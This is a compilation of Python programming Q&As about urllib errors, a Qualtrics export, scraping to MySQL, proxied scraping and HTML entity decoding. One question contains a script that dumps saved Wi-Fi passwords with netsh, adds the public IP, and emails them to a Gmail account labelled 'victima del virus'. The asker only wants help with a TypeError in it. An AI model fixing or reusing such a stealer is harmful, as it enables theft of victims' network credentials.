python error: request isn't defined - python-3.x

I am trying to learn how to automatically fetch URLs from a page. In the following code I am trying to get the port coordinates from the webpage via different links:
import urllib.request
import re

a = input("What country is your port in?: ")
b = input("What is the name of the port?: ")
url = "http://ports.com/"
totalurl = "http://ports.com/" + a + "/" + b + "/"
htmlfile = request.urlopen(url)
htmltext = htmlfile.read()
regex = '<span class="small' + a + "/" + b + "/" '">...</span>'
pattern = re.compile(regex)
with urllib.request.urlopen(url) as response:
    html = response.read().decode()
num = re.findall(pattern, html)
print(num)
This is the error message I receive:
What country is your port in?: greece
What is the name of the port?: port-of-eleusis
Traceback (most recent call last):
  File "/Users/kieronblemings/Desktop/PROGRAMS PYTHON/ports extraction.py", line 13, in <module>
    htmlfile = request.urlopen(url)
NameError: name 'request' is not defined
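The NameError happens because the code imports the urllib.request submodule but then calls the bare name request, which was never bound. A minimal sketch of the fetch line with the import and the call matched up (either form works; the rest of the script stays the same):

# Option 1: keep "import urllib.request" and use the full dotted name
import urllib.request
htmlfile = urllib.request.urlopen(url)

# Option 2: bind the short name explicitly, so request.urlopen(url) is defined
from urllib import request
htmlfile = request.urlopen(url)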

Related

TypeError: sequence item 4: expected str instance, _io.TextIOWrapper found in PYTHON 3.8.1

I'm Spanish, so some parts of the code (especially names and other things) are in Spanish.
Python gives me this error. I'd like some help because I'm new to Python and fixing errors isn't my strong suit (sorry for my English).
Traceback (most recent call last):
  File "C:\Users\Ticua\Desktop\#test with ip.py", line 38, in <module>
    BODY = '\r\n'.join(['To: %s' % TO, 'From: %s' % gmail_sender,'Subject: victima del virus', ip, f])
TypeError: sequence item 4: expected str instance, _io.TextIOWrapper found
%%MYPASSWORD%% is a placeholder for the mail account's password, which I don't want to reveal.
My code:
import subprocess
requests = 'requests'
subprocess.call(['pip', 'install', requests])
from requests import get
import smtplib
ip = str(get('https://api.ipify.org').text)
y = 'C:'
reques = input("pon el nombre de tu red : ")
x = str(subprocess.call(['netsh', 'wlan', 'export', 'profile', 'key=clear', 'folder=C:']))
f = open('C:' + '/Conexión de red inalámbrica-' + reques + '.xml', 'r')
TO = 'ticua07#gmail.com'
SUBJECT = 'victima del virus'
TEXT = ip, f
# Gmail Sign In
gmail_sender = 'logonuihacks#gmail.com'
gmail_passwd = '%%MYPASSWORD%%'
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(gmail_sender, gmail_passwd)
BODY = '\r\n'.join(['To: %s' % TO, 'From: %s' % gmail_sender,'Subject: victima del virus', ip, f])
f.close()
try:
server.sendmail(gmail_sender, [TO], BODY)
print ('email sent')
except:
print("fu***d up")

Download survey results from Qualtrics into Python

I am trying to get the survey responses from Qualtrics directly into a pandas DataFrame in Python. Is there a way of doing so?
import shutil
import os
import requests
import zipfile
import json
import io
# Setting user Parameters
# apiToken = "myKey"
# surveyId = "mySurveyID"
# fileFormat = "csv"
# dataCenter = "az1"
apiToken = "HfDjOn******"
surveyId = "SV_868******"
fileFormat = "csv"
dataCenter = 'uebs.eu'
# Setting static parameters
requestCheckProgress = 0
progressStatus = "in progress"
baseUrl = "https://{0}.qualtrics.com/API/v3/responseexports/".format(dataCenter)
headers = {
    "content-type": "application/json",
    "x-api-token": apiToken,
}
Then, for step 1 (creating the data export), I set
downloadRequestUrl = baseUrl
When I try to access that URL from Chrome, it gives me the following:
{"meta":{"httpStatus":"404 - Not Found","error":{"errorMessage":"The requested resource does not exist."}}}
This, I believe, is the main reason why, after running this code:
# Step 1: Creating Data Export
downloadRequestUrl = baseUrl
downloadRequestPayload = '{"format":"' + fileFormat + '","surveyId":"' + surveyId + '"}'
downloadRequestResponse = requests.request("POST", downloadRequestUrl, data=downloadRequestPayload, headers=headers)
progressId = downloadRequestResponse.json()["result"]["id"]
print(downloadRequestResponse.text)
It gives me this error
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
<ipython-input-38-cd611e49879c> in <module>
3 downloadRequestPayload = '{"format":"' + fileFormat + '","surveyId":"' + surveyId + '"}'
4 downloadRequestResponse = requests.request("POST", downloadRequestUrl, data=downloadRequestPayload, headers=headers)
----> 5 progressId = downloadRequestResponse.json()["result"]["id"]
6 print(downloadRequestResponse.text)
KeyError: 'result'
I am somewhat new to the Qualtrics/Python interface. Could someone explain why I am having this difficulty? Is it because of the dataCenter?
Thank you
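Judging from the 404 in the browser and the KeyError, one likely cause is the baseUrl: the dataCenter part has to be your account's Qualtrics datacenter ID (shown on the Qualtrics IDs page of your account settings, e.g. "az1" or "fra1"), not a domain like 'uebs.eu', so the POST never reaches a valid endpoint and the returned JSON has no "result" key. A minimal sketch, with a hypothetical datacenter ID, that checks the response before indexing into it so the real error is visible instead of a bare KeyError:

import requests

dataCenter = "fra1"  # assumption: replace with the datacenter ID from your account settings
baseUrl = "https://{0}.qualtrics.com/API/v3/responseexports/".format(dataCenter)
headers = {
    "content-type": "application/json",
    "x-api-token": apiToken,
}

downloadRequestPayload = '{"format":"' + fileFormat + '","surveyId":"' + surveyId + '"}'
downloadRequestResponse = requests.post(baseUrl, data=downloadRequestPayload, headers=headers)

body = downloadRequestResponse.json()
if "result" not in body:
    # surfaces a bad datacenter, token, or survey ID instead of a KeyError
    raise RuntimeError("Export request failed: " + downloadRequestResponse.text)
progressId = body["result"]["id"]
print(progressId)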

Insert dynamic data to mysql with python

EDITED:
I wrote some code which returns two outputs, but an error appears.
What is the main problem with my code?
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import os
import sys
import codecs
from urllib.request import urlopen
import pymysql
import mysql.connector

for i in range(1):  # electronic
    my_url = "https://www.xxxxx.com/mobile_phones/?facet_is_mpg_child=0&viewType=gridView&page="
    uClient = uReq(my_url + str(i))
    page_html = uClient.read()
    uClient.close()
    page_soup = soup(page_html, "html.parser")
    containers = page_soup.findAll("div", {"class": "sku -gallery"})
    for container in containers:
        name = container.img["alt"]
        title_container = container.findAll("span", {"class": "brand"})
        Brand = title_container[0].text
        price = container.findAll("span", {"class": "price"})
        price_one = price[0].text.strip()
        price_old = container.findAll("span", {"class": "price -old "})
        price_two = '0'
        if len(price_old) > 0:
            price_two = price_old[0].text.strip()
        rank = container.findAll("span", {"class": "rating-aggregate"})
        ranking = 'N/A'
        if len(rank) > 0:
            ranking = rank[0].text.strip()
        conn = pymysql.connect(host="localhost", user="root", passwd="", db="prod")
        x = conn.cursor()
        #name1 = name()
        #brand1 = Brand()
        #price_one1 = price_one1()
        #price_two1= price_one1()
        #rank1 = rank()
        x.execute("INSERT INTO list (productname,brand,price1,price2,rank) VALUES (%s,%s,%s,%s.%s)", (name, Brand, price_one, price_two, ranking))
        conn.commit()
        conn.close()
C:\Users\xxxx\AppData\Local\Programs\Python\Python35\python.exe C:/Users/xxxx/.PyCharm2018.2/config/scratches/bd.py
Traceback (most recent call last):
  File "C:/Users/xxxx/.PyCharm2018.2/config/scratches/bd.py", line 54, in <module>
    x.execute("INSERT INTO list (productname,brand,price1,price2,rank) VALUES (%s,%s,%s,%s.%s)", (name, Brand, price_one, price_two, ranking))
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\cursors.py", line 170, in execute
    result = self._query(query)
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\cursors.py", line 328, in _query
    conn.query(q)
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py", line 516, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py", line 727, in _read_query_result
    result.read()
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py", line 1066, in read
    first_packet = self.connection._read_packet()
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\connections.py", line 683, in _read_packet
    packet.check_error()
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "C:\Users\xxxx\AppData\Local\Programs\Python\Python35\lib\site-packages\pymysql\err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '.'2')' at line 1")

Process finished with exit code 1
The problem is in the VALUES clause of your INSERT: the last two placeholders are separated by a period instead of a comma, which is exactly what MariaDB is complaining about near '.'2')'. Also make sure the value you pass for that column is ranking (the stripped text), not rank (the ResultSet).
By the code you have given,
rank = container.findAll("span",{"class" : "rating-aggregate"})  # ResultSet
if len(rank) > 0:
    ranking = rank[0].text.strip()  # result
So the change is
x.execute("INSERT INTO list (productname,brand,price1,price2,rank) VALUES (%s,%s,%s,%s,%s)", (name, Brand, price_one, price_two, ranking))
and you are ready to go! I have a suggestion for you as well: if you declare a variable inside an if block, always provide an else branch or a default value; otherwise you can end up with a NameError when the condition fails. For example,
rank = container.findAll("span",{"class" : "rating-aggregate"})
ranking = rank[0].text.strip() if len(rank) > 0 else 'N/A'
Or,
rank = container.findAll("span",{"class" : "rating-aggregate"})
ranking = 'N/A'
if len(rank) > 0:
    ranking = rank[0].text.strip()
Cheers!
This code stores the information in a CSV file, but now I need to save it to MySQL (see the sketch after the code below).
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import os
import sys
import unicodecsv as csv
import codecs
from urllib.request import urlopen

for i in range(3):  # electronic
    my_url = "https://www.xxxx.com/mobile_phones/?facet_is_mpg_child=0&viewType=gridView&page="
    uClient = uReq(my_url + str(i))
    page_html = uClient.read()
    uClient.close()
    page_soup = soup(page_html, "html.parser")
    containers = page_soup.findAll("div", {"class": "sku -gallery"})
    filename = "mobile.csv"
    f = codecs.open(filename, "a", "utf-8-sig")
    headers = "name, Brand, price_one, price_two, ranking\n"
    f.write(headers)
    for container in containers:
        name = container.img["alt"]
        title_container = container.findAll("span", {"class": "brand"})
        Brand = title_container[0].text
        price = container.findAll("span", {"class": "price"})
        price_one = price[0].text.strip()
        price_old = container.findAll("span", {"class": "price -old "})
        price_two = 0
        if len(price_old) > 0:
            price_two = price_old[0].text.strip()
        rank = container.findAll("span", {"class": "rating-aggregate"})
        if len(rank) > 0:
            ranking = rank[0].text.strip()
        print("name " + name)
        print("Brand " + Brand)
        print("price_one " + price_one)
        print("price_two {}".format(price_two))  # ---->
        print("ranking " + ranking)
        f.write(name + "," + Brand.replace(",", "|") + "," + price_one.replace(",", "") + "," + price_two.replace(",", "") + "," + ranking + "\n")
    f.close()
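Building on the corrected INSERT from the answer above, here is a minimal sketch of writing one scraped row to MySQL with pymysql instead of the CSV file. The table and column names are the ones used earlier and are assumed to already exist; the sample values stand in for (name, Brand, price_one, price_two, ranking) from the loop:

import pymysql

# assumption: the "prod" database already contains the "list" table used above
conn = pymysql.connect(host="localhost", user="root", passwd="", db="prod")
cursor = conn.cursor()

# example values; in the scraper this would be (name, Brand, price_one, price_two, ranking)
row = ("Example Phone X1", "ExampleBrand", "199", "0", "4.5 out of 5")

# placeholders are all comma-separated, and `rank` is backtick-quoted since it is
# a reserved word on some newer MySQL servers
cursor.execute(
    "INSERT INTO list (productname, brand, price1, price2, `rank`) "
    "VALUES (%s, %s, %s, %s, %s)",
    row,
)

conn.commit()
conn.close()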

AttributeError: 'str' object has no attribute 'text' python 2.7

I know there are many questions like this, but the answers are all specific and only fix the problem for that person's particular script.
I am currently trying to print a bunch of info from supremenewyork.com, using the UK site. This script can successfully print all the info I want from Supreme US, but when I added the proxy code I started to get a lot of errors.
I know the proxy code works because I tested it in a small script and it was able to pull info that was on Supreme UK and didn't exist on Supreme US.
Here is my script:
import requests
from bs4 import BeautifulSoup

UK_Proxy1 = raw_input('UK http Proxy1: ')
UK_Proxy2 = raw_input('UK http Proxy2: ')

proxies = {
    'http': 'http://' + UK_Proxy1 + '',
    'https': 'http://' + UK_Proxy2 + '',
}

categorys = ['jackets','shirts','tops_sweaters','sweatshirts','pants','shorts','t-shirts','hats','hats','bags','accessories','shoes','skate']
catNumb = 0
altArray = []
nameArray = []
styleArray = []

for cat in categorys:
    catStr = str(categorys[catNumb])
    cUrl = 'http://www.supremenewyork.com/shop/all/' + catStr
    proxy_script = requests.get((cUrl.text), proxies=proxies)
    bSoup = BeautifulSoup(proxy_script, 'lxml')
    print('\n*******************"' + catStr.upper() + '"*******************\n')
    catNumb += 1
    for item in bSoup.find_all('div', class_='inner-article'):
        url = item.a['href']
        alt = item.find('img')['alt']
        req = requests.get('http://www.supremenewyork.com' + url)
        item_soup = BeautifulSoup(req.text, 'lxml')
        name = item_soup.find('h1', itemprop='name').text
        style = item_soup.find('p', itemprop='model').text
        print alt + (' --- ') + name + (' --- ') + style
        altArray.append(alt)
        nameArray.append(name)
        styleArray.append(style)

print altArray
print nameArray
print styleArray
I am getting this error when I execute the script
AttributeError: 'str' object has no attribute 'text', with the error pointing towards the line
proxy_script = requests.get((cUrl.text), proxies=proxies)
I recently added a change to the script which sort of fixed it: it was able to print the categories, but none of the info between them (which I NEED); it just printed ****************jackets**************, ****shirts******, etc. Here is what I changed:
import requests
from bs4 import BeautifulSoup

# make sure proxy is http and port 8080
UK_Proxy1 = raw_input('UK http Proxy1: ')
UK_Proxy2 = raw_input('UK http Proxy2: ')

proxies = {
    'http': 'http://' + UK_Proxy1 + '',
    'https': 'http://' + UK_Proxy2 + '',
}

categorys = ['jackets','shirts','tops_sweaters','sweatshirts','pants','shorts','t-shirts','hats','bags','accessories','shoes','skate']
catNumb = 0
altArray = []
nameArray = []
styleArray = []

for cat in categorys:
    catStr = str(categorys[catNumb])
    cUrl = 'http://www.supremenewyork.com/shop/all/' + catStr
    proxy_script = requests.get(cUrl, proxies=proxies).text
    bSoup = BeautifulSoup(proxy_script, 'lxml')
    print('\n*******************"' + catStr.upper() + '"*******************\n')
    catNumb += 1
    for item in bSoup.find_all('div', class_='inner-article'):
        url = item.a['href']
        alt = item.find('img')['alt']
        req = requests.get('http://www.supremenewyork.com' + url)
        item_soup = BeautifulSoup(req.text, 'lxml')
        name = item_soup.find('h1', itemprop='name').text
        style = item_soup.find('p', itemprop='model').text
        print alt + (' --- ') + name + (' --- ') + style
        altArray.append(alt)
        nameArray.append(name)
        styleArray.append(style)

print altArray
print nameArray
print styleArray
I put .text at the end and it sort of worked. How do I fix it so it prints the info I want?
I think you missed something: your cUrl is a string, not a response object, so it has no .text attribute. I guess you want:
proxy_script = requests.get(cUrl, proxies=proxies).text
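As for the categories printing with nothing between them, one possibility (an assumption, since it depends on the proxy and on what is UK-only) is that the category page fetched through the proxy is not returning the product grid at all, or that the per-item request is made without the proxy. A short sketch that routes every request through one proxied session and prints what actually comes back, to narrow down where it goes wrong:

import requests
from bs4 import BeautifulSoup

# hypothetical proxy address; same shape as the proxies dict built from raw_input above
proxies = {'http': 'http://203.0.113.10:8080', 'https': 'http://203.0.113.10:8080'}

session = requests.Session()
session.proxies.update(proxies)  # every request made with this session goes through the proxy

cUrl = 'http://www.supremenewyork.com/shop/all/jackets'
listing = session.get(cUrl)
print(listing.status_code)       # anything other than 200 points at the proxy

bSoup = BeautifulSoup(listing.text, 'lxml')
items = bSoup.find_all('div', class_='inner-article')
print(len(items))                # 0 here means the proxied page contained no products

for item in items:
    req = session.get('http://www.supremenewyork.com' + item.a['href'])  # proxied as well
    item_soup = BeautifulSoup(req.text, 'lxml')
    name_tag = item_soup.find('h1', itemprop='name')
    if name_tag is not None:
        print(name_tag.text)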

how can I convert these outputted coordinates to standard looking ones?

I have this code that outputs coordinates for a port:
import urllib
import urllib.request as request
import re

a = input("What country is your port in?: ")
b = input("What is the name of the port?: ")
url = "http://ports.com/"
country = ["united-kingdom","greece"]
ports = ["port-of-eleusis","portsmouth-continental-ferry-port","poole-harbour"]
totalurl = "http://ports.com/" + a + "/" + b + "/"
htmlfile = urllib.request.urlopen(totalurl)
htmltext = htmlfile.read()
regex = '<strong>Coordinates:</strong>(.*?)</span>'
pattern = re.compile(regex)
with urllib.request.urlopen(totalurl) as response:
    html = htmltext.decode()
num = re.findall(pattern, html)
print(num)
The output is correct and readable, but I need the coordinates in a format like 39°09'24.6''N 175°37'55.8''W instead of:
>>> [' 50&#176;48&#8242;41.04&#8243;N 1&#176;5&#8242;31.31&#8243;W']
This happens because HTML uses these character references to display specific Unicode characters, while Python does not decode them for you. To fix this, replace print(num) with print(list(i.replace('&#176;', "°").replace('&#8242;', "′").replace('&#8243;', "″") for i in num))
This essentially replaces &#176; with °, &#8242; with ′, and &#8243; with ″.
>>> print(list(i.replace('&#176;', "°").replace('&#8242;', "′").replace('&#8243;', "″") for i in num))
[" 50°48′41.04″N 1°5′31.31″W"]
>>>
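A more general alternative, assuming the captured strings contain standard HTML character references, is to let the standard library decode every entity at once instead of replacing them one by one:

import html

num = [' 50&#176;48&#8242;41.04&#8243;N 1&#176;5&#8242;31.31&#8243;W']  # example value as scraped
decoded = [html.unescape(i) for i in num]
print(decoded)  # [' 50°48′41.04″N 1°5′31.31″W']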
